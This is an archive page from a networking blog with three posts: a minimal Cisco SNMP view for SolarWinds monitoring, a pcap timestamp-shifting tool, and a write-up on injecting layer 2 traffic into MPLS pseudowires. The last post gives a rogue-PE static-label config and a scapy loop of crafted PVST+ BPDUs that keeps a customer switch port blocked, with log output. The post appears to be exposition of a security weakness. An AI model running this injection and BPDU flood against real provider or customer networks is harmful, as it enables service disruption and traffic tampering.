Networking Bodges: January 2015

Friday, 23 January 2015

Minimal SNMP View for Solarwinds Management of a Cisco Device

Some time ago, I was asked to provide a customer read-only SNMP access to a router so that they could monitor bandwidth utilisation. Unfortunately the device had some sensitive configuration which needed to be protected, so giving access to the full MIB was not an option. With that in mind, I set up an SNMP view which permitted access to the ifMIB and nothing else, thinking that would be sufficient to monitor interface usage.

The customer tested and soon came back to advise me that, although he could successfully run an SNMP walk, his Solarwinds NMS could not discover the device and therefore he couldn't get the stats he needed.

It turns out that Solarwinds needs a particular set of OIDs to be visible before it will allow a device to be discovered and brought under management. There are a few articles on the knowledge base about which OIDs it uses for various purposes, e.g:

http://knowledgebase.solarwinds.com/kb/questions/1196/What+object+IDs+(OIDs)+does+Orion+NPM+poll+for+interface+information%3F+What+types+of+interface+information+does+Orion+NPM+poll%3F

http://knowledgebase.solarwinds.com/kb/questions/1196/

However, there doesn't seem to be one directly addressing the question of which OIDs are required just to bring a device under management.

Eventually I think I gave up and sniffed a discovery off the wire and looked at which OIDs it used - I don't exactly remember any more. Anyway, here is a list that seems to do the trick. The following CLI should configure a minimal set of OIDs on a Cisco device:

snmp-server view STATS iso excluded
snmp-server view STATS mib-2 excluded
snmp-server view STATS cisco excluded
snmp-server view STATS system.1.0 included
snmp-server view STATS system.2.0 included
snmp-server view STATS system.4.0 included
snmp-server view STATS system.5.0 included
snmp-server view STATS system.6.0 included
snmp-server view STATS ifIndex included
snmp-server view STATS ifDescr included
snmp-server view STATS ifSpeed included
snmp-server view STATS ifOperStatus included
snmp-server view STATS ipAddrEntry.2 included
snmp-server view STATS lsystem.8 included
snmp-server view STATS lsystem.58 included
snmp-server view STATS chassis.6 included
snmp-server view STATS ifName included
snmp-server view STATS ifHCInOctets included
snmp-server view STATS ifHCInUcastPkts included
snmp-server view STATS ifHCInMulticastPkts included
snmp-server view STATS ifHCInBroadcastPkts included
snmp-server view STATS ifHCOutOctets included
snmp-server view STATS ifHCOutUcastPkts included
snmp-server view STATS ifHCOutMulticastPkts included
snmp-server view STATS ifHCOutBroadcastPkts included
snmp-server view STATS ifHighSpeed included
snmp-server view STATS ifAlias included
snmp-server view STATS ciscoMemoryPoolEntry.5 included
snmp-server view STATS ciscoMemoryPoolEntry.6 included
snmp-server view STATS cpmCPUTotalTable.1.5 included
snmp-server view STATS cpmCPUTotalTable.1.8 included

Once the view is defined, you just need to apply it to the particular community string for SNMPv2:

snmp-server community mycomm view STATS RO

Or the user for SNMPv3:

snmp-server group Monitoring v3 priv read STATS write STATS

This config allowed SolarWinds to discover the device and bring it under management. It also allowed basic port stats to be collected and general up/down alarms to be raised.

Of course, you can add more OIDs into the "included" list as needed for your particular use case, however these should be enough for SolarWinds to discover the device.

Adjusting timestamps in PCAP files

Many times in the past I've had to look at a pair of pcap files side by side in order to troubleshoot an issue. More often than not, one of the PCAP files was produced on a ropey old laptop whose clock is "almost right" - the timestamps between the two files then don't tie up and it is a pain to keep working out "if it's time X in that file, I need to look at time Y in this file..."

This week I overheard a colleague in the office having exactly that problem and thought it wouldn't be too hard to build a utility to time shift pcap files by a specified amount. So here it is:

https://github.com/theclam/capshift

Installation

As explained in the readme, it should be possible to compile on any system with gcc using only the standard libraries. Just download the capshift.c and capshift.h files and compile (gcc -o capshift capshift.c), or download a binary if one exists for your system.

Usage

Capshift takes three arguments, all mandatory:

The input pcap file, specified using -r
The output pcap file, specified using -w
The time offset value (positive or negative), specified using -o

Here's an example:

Harrys-MacBook-Air:capshift foeh$ tshark -ta -r before.cap
1 15:30:45.978539 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4748/35858, ttl=128
2 15:30:45.979407 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4748/35858, ttl=255
3 15:30:46.979315 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4749/36114, ttl=128
4 15:30:46.980274 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4749/36114, ttl=255
5 15:30:47.980323 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4750/36370, ttl=128
6 15:30:47.981215 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4750/36370, ttl=255
7 15:30:48.981387 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4751/36626, ttl=128
8 15:30:48.982277 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4751/36626, ttl=255
Harrys-MacBook-Air:capshift foeh$ capshift -r before.cap -w after.cap -o -0.5

Parsing capfile, attempting to shift backward by 0.500000 seconds...

8 frames processed.
Harrys-MacBook-Air:capshift foeh$ tshark -ta -r after.cap
1 15:30:45.478539 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4748/35858, ttl=128
2 15:30:45.479407 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4748/35858, ttl=255
3 15:30:46.479315 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4749/36114, ttl=128
4 15:30:46.480274 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4749/36114, ttl=255
5 15:30:47.480323 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4750/36370, ttl=128
6 15:30:47.481215 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4750/36370, ttl=255
7 15:30:48.481387 192.168.1.25 -> 192.168.1.1 ICMP 74 Echo (ping) request id=0x0001, seq=4751/36626, ttl=128
8 15:30:48.482277 192.168.1.1 -> 192.168.1.25 ICMP 74 Echo (ping) reply    id=0x0001, seq=4751/36626, ttl=255

As usual, if you find this useful or have any feedback (good or bad) please leave a comment!

Monday, 12 January 2015

Bending the MPLS Security Model - part 3 (Layer 2 Injection)

Attack 1 - layer 2 injection

Back in the days when I did solution validation and regression testing for a living, I normally had to set up full solutions in the lab, built to specific designs. I would then often need test egress QoS policies, filters and so on. To be sure that ingress QoS and filters did not invalidate the results, I had a few options:

1. Temporarily remove the ingress policies, making sure they were re-applied correctly afterwards and that nobody else tested in the mean time

2. Build a duplicate service but instead of terminating the far end on a real device, emulate everything from IGP up on a tester

3. Cheat

Option 1 is pretty risky as "temporary" easily turns into "permanent" if you're not very careful. Option 2 is a lot of work and runs the risk of compromising the design in order to inter-operate with the tester.

Given that the drawbacks of the other available options, I usually fell back on option 3. What I would do is set up the service as per design, then attach the tester somewhere in the MPLS core - basically any port that would label switch. The tester didn't need to peer any protocols at all, saving huge amounts of setup and troubleshooting time, as the packets would be hand crafted in true "dirty hack" style. All I had to do was look at the label bindings on the egress PE to work out what service label to use and on the first hop router to see what transport label needed to be used.

I'll make this example a little simpler by getting a router to do the ARP, work out the transport label and encapsulate the packets. Rest assured that it's perfectly possible to do this by hand if you don't have a real PE. We'll take a simple pseudowire service as an example. We have the following setup:

We want to make our traffic from device X come out of the PE towards LAN B, as if it had been sent through from LAN A. Two things are needed for this:

The transport label that will get traffic forwarded to router B
The service label that PE B expects to receive for the pseudowire

Now in my lab example, I could just log onto each of the devices and get these. The transport label to get to PE B can be found in the output of the neighbouring router's "show mpls ldp bindings" or similar, in our example we will just let the "evil" PE learn it via LDP. The service label could be found in the bindings list for PE A or PE B, may be sniffed from live traffic if you have access to somewhere in the switching path, or can be guessed using the information in the previous post.

Anyway, we can use the evil PE to do most of the donkey work for us as far as encapsulation goes. With a fairly simple config, the PE can be made to inject into whatever service we like. Because this is a static config, the evil PE doesn't tell any other devices we are doing this.

Here's the config from the evil PE (Cisco IOS):

mpls label range 100 1048575 static 16 99

interface GigabitEthernet1/1

no ip address

xconnect 10.255.255.2 100 encapsulation mpls manual

mpls label 99 19

mpls control-word

The blue section simply reserves part of the label range for static allocation. The actual numbers aren't important but in order to build the bogus EoMPLS service we need to statically assign an incoming label (even though it will never be used). By default, IOS doesn't reserve any of the label space for static allocation and, until you do, you can't assign a manual label. In this example we designate that labels 100 - 1048575 are to be used for dynamic allocation (i.e. given out by LDP, BGP) and labels 16 - 99 are reserved for static allocation, though the actual numbers aren't important.

The red section looks very similar to a normal EoMPLS service build, except for the use of the keyword "manual" and the MPLS tweaks inside. The manual keyword does exactly what you would expect, i.e. it tells the router that this VC will not be signalled using LDP but rather the parameters are going to be manually (statically) configured.

Once in the xconnect context we define what labels the service will use in each direction - inbound first (we don't care what this is) and then outbound (this has to match the label expected by the EoMPLS service into which we are trying to inject traffic). Remember, you may have to guess the outbound label if you don't have access to either of the serving PEs.

Finally, depending on the vendor and / or configuration of the serving PEs you may need to adjust the control-word setting. Cisco and recent Junipers default to enabled, Alcatel-Lucent and older Junipers default to disabled.

Now, assuming the label is correct, any frames attacker "X" sends into the Evil PE will come out of the MPLS core and hit user B as if they had been sent by user A. This is unidirectional so the potential for "connecting" to anything is not really there, however there is a massive amount of harm that can be done at this point. Possible attacks range from a simple flood to spanning tree & LACP attacks, even creating IP conflicts or interfering with the operation of routing protocols.

Worked Example

Here's an example showing how an attacker can use the setup above to wreak havoc by throwing in some random PVST packets. The customer setup is as below, with a Cisco switch attached to each of the provider edge routers and a layer 2 service running between.

Note, the switches are running PVST over the link as per default. If a switch sees a BPDU marked as being from the "wrong" VLAN it will decide the port is "broken" (Cisco's terminology, not mine) and block it.

As an attacker we can use this to our advantage by sending frames for 2 different VLAN IDs towards one of the switches. That way, whatever the native VLAN ID of the receiving port is set to, at least one of the VLAN IDs will be incorrect and force the switch to block.

Here's a scruffy scapy loop to do that:

>>> import time
>>> outint='eth0'
>>> bridgemac='\x00\x00\x00\x00\x00\x01'

>>> while True:
... sendp(Dot3(src='00:00:00:00:00:01', dst='01:80:c2:00:00:00')/LLC(dsap=170,ssap=170,ctrl=3)/Raw(load='\x00\x00\x0c\x01\x0b\x00\x00\x00\x00\x00\x80\x00'+bridgemac+'\x00\x00\x00\x00'+'\x80\x00'+bridgemac+'\x80\x01'+'\x00\x00\x14\x00\x02\x00\x0f\x00\x00'+'\x00\x00\x00\x02'+'\x00\x02'),iface=outint)
... time.sleep(10)

... sendp(Dot3(src='00:00:00:00:00:01', dst='01:80:c2:00:00:00')/LLC(dsap=170,ssap=170,ctrl=3)/Raw(load='\x00\x00\x0c\x01\x0b\x00\x00\x00\x00\x00\x80\x00'+bridgemac+'\x00\x00\x00\x00'+'\x80\x00'+bridgemac+'\x80\x01'+'\x00\x00\x14\x00\x02\x00\x0f\x00\x00'+'\x00\x00\x00\x02'+'\x00\x03'),iface=outint)
...
.
Sent 1 packets.
^C

As long as the loop continues, the port will always remain down. A nice DoS that would be pretty hard to figure out, even if the console messages are quite clear (below from a single BDPU):

SW2#

*Mar 1 02:04:21.755: %SPANTREE-2-RECV_PVID_ERR: Received BPDU with inconsistent peer vlan id 3 on FastEthernet0/1 VLAN1.

*Mar 1 02:04:21.755: %SPANTREE-2-BLOCK_PVID_LOCAL: Blocking FastEthernet0/1 on VLAN1. Inconsistent local vlan.

SW2#PVST+: restarted the forward delay timer for FastEthernet0/1

SW2#

*Mar 1 02:04:36.831: %SPANTREE-2-UNBLOCK_CONSIST_PORT: Unblocking FastEthernet0/1 on VLAN1. Port consistency restored.

SW2# PVST+:Inconsistency timer expired. inconsistency 0

cleared for FastEthernet0/1

One bad PVST+ BPDU will generally cause the port to block for anywhere between 10 and 50s. It's extremely efficient :)

References

http://www.cisco.com/c/en/us/td/docs/ios/mpls/configuration/guide/15_0s/mp_15_0s_book/mp_atom_pseud_prov.html

http://www.juniper.net/techpubs/en_US/junos12.2/topics/concept/layer-two-circuits-overview-solutions.html